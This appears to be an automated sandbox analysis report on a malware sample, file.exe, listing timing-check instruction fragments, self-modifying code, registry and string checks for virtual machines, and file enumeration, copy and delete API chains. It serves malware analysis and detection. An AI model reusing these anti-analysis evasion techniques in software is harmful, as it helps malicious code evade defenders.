              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A67 second address: 8B9A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A71 second address: 8B9A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DABh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A80 second address: 8B9AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FE8A076DDC6h 0x00000011 jmp 00007FE8A076DDCAh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA459 second address: 8BA461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA461 second address: 8BA469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0F0F second address: 8D0F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FE8A0813DA6h 0x00000010 jl 00007FE8A0813DA6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3114 second address: 8D3119 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D79EE second address: 8D79F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D79F2 second address: 8D79F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D79F6 second address: 8D7A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DB0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7A10 second address: 8D7A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8D7A16 second address: 8D7A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E13D5 second address: 8E13D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E13D9 second address: 8E13EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE8A0813DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FE8A0813DA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E13EE second address: 8E1407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jnc 00007FE8A076DDC6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E1407 second address: 8E140B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E2C64 second address: 8E2C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE8A076DDD2h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8EBF28 second address: 8EBF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8EBF2D second address: 8EBF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD4h 0x00000007 pushad 0x00000008 jp 00007FE8A076DDC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8EACF9 second address: 8EAD16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE8A0813DB8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8EB0E8 second address: 8EB0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8EBCB8 second address: 8EBCBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8EEA66 second address: 8EEA91 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE8A076DDCBh 0x0000000f jng 00007FE8A076DDC8h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE8A076DDCBh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F01F1 second address: 8F01FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F0088 second address: 8F0092 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE8A076DDE5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F0092 second address: 8F00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DB9h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F00B2 second address: 8F00B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F3F08 second address: 8F3F18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE8A0813DA6h 0x0000000a jg 00007FE8A0813DA6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80616B second address: 806171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 806171 second address: 806175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90D626 second address: 90D650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 jmp 00007FE8A076DDD3h 0x0000000c pop ebx 0x0000000d je 00007FE8A076DDCCh 0x00000013 jg 00007FE8A076DDC6h 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90D7A9 second address: 90D7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90D7B1 second address: 90D7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE8A076DDCFh 0x0000000a pushad 0x0000000b push ecx 0x0000000c jmp 00007FE8A076DDD5h 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 923ED4 second address: 923EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE8A0813DA6h 0x0000000a jne 00007FE8A0813DA6h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 923EEB second address: 923EFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jl 00007FE8A076DDC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 923EFE second address: 923F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 923F04 second address: 923F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE8A076DDC6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 923F12 second address: 923F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE8A0813DB4h 0x0000000c jnc 00007FE8A0813DA6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 923238 second address: 923272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A076DDD8h 0x00000009 js 00007FE8A076DDC6h 0x0000000f jmp 00007FE8A076DDD7h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 923272 second address: 92327E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE8A0813DAEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9237B8 second address: 9237CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE8A076DDC6h 0x0000000a popad 0x0000000b jo 00007FE8A076DDCCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 923AAC second address: 923AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 923AB0 second address: 923AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 926CFD second address: 926D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007FE8A0813DAEh 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FE8A0813DA8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 926D21 second address: 926D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE8A076DDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5300256 second address: 5300265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5300265 second address: 530027D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE8A076DDD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 530027D second address: 5300281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53002CE second address: 53002D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, 08h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53002D5 second address: 53002F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE8A0813DB7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 844406 second address: 84440F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84440F second address: 844413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 68FAC3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 83382F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8C7664 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision | graph_0-27166
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes | graph_0-25984
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.8 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_004518A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00453910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00453910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00451250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00451250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00451269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00451269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_0045E210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00454B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00454B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00454B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_00454B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_0045CBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_0044DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00452390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA | 0_2_00452390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_0044DB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_004523A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy | 0_2_0045DD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_0045D530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_004416A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_004416B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00461BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess | 0_2_00461BF0
Source: file.exe, file.exe, 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1745302032.00000000015B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
Source: file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
